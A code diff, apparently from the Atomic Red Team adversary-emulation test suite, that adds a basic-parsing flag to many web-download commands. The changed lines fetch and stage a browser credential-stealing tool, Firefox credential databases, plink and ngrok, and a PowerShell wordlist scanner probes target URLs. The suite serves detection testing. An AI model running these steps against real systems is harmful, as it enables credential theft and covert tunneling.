Start-Process -FilePath $installer -Wait
|
||||
Stop-Process -Name "firefox"
|
||||
- description: |
|
||||
@@ -441,14 +441,14 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
|
||||
Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" -UseBasicParsing
|
||||
- description: |
|
||||
Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path.
|
||||
prereq_command: |-
|
||||
if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" -UseBasicParsing
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
$profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
|
||||
@@ -488,7 +488,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing
|
||||
msiexec /i $installer /qn
|
||||
Start-Process -FilePath "chrome.exe"
|
||||
Stop-Process -Name "chrome"
|
||||
|
||||
@@ -346,7 +346,7 @@ atomic_tests:
|
||||
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
|
||||
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
# Extract line with IP address from the syslog configuration output
|
||||
|
||||
@@ -74,7 +74,7 @@ atomic_tests:
|
||||
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
|
||||
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
|
||||
|
||||
@@ -25,14 +25,14 @@ atomic_tests:
|
||||
if (Test-Path "#{msi_file_path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{msi_file_path}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}" -UseBasicParsing
|
||||
- description: |
|
||||
CAB file must exist on disk at specified location (#{cab_file_path})
|
||||
prereq_command: |
|
||||
if (Test-Path "#{cab_file_path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{cab_file_path}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" -UseBasicParsing
|
||||
- description: |
|
||||
Old version of Virtualbox must be installed
|
||||
prereq_command: |
|
||||
|
||||
@@ -134,7 +134,7 @@ atomic_tests:
|
||||
if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
|
||||
Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
|
||||
Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -UseBasicParsing
|
||||
Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
|
||||
executor:
|
||||
command: |
|
||||
|
||||
@@ -5,7 +5,7 @@ function Test-Target {
|
||||
)
|
||||
|
||||
try {
|
||||
Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck
|
||||
Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing
|
||||
return $true
|
||||
}
|
||||
catch {
|
||||
@@ -31,7 +31,7 @@ function Invoke-WordlistScan {
|
||||
|
||||
foreach ($Word in $Wordlist) {
|
||||
$Url = $Target + "/" + $Word
|
||||
$Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck
|
||||
$Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing
|
||||
|
||||
if ($Response.StatusCode -ge 200 -and $Response.StatusCode -lt 400) {
|
||||
$Results += $Url
|
||||
|
||||
Reference in New Issue
Block a user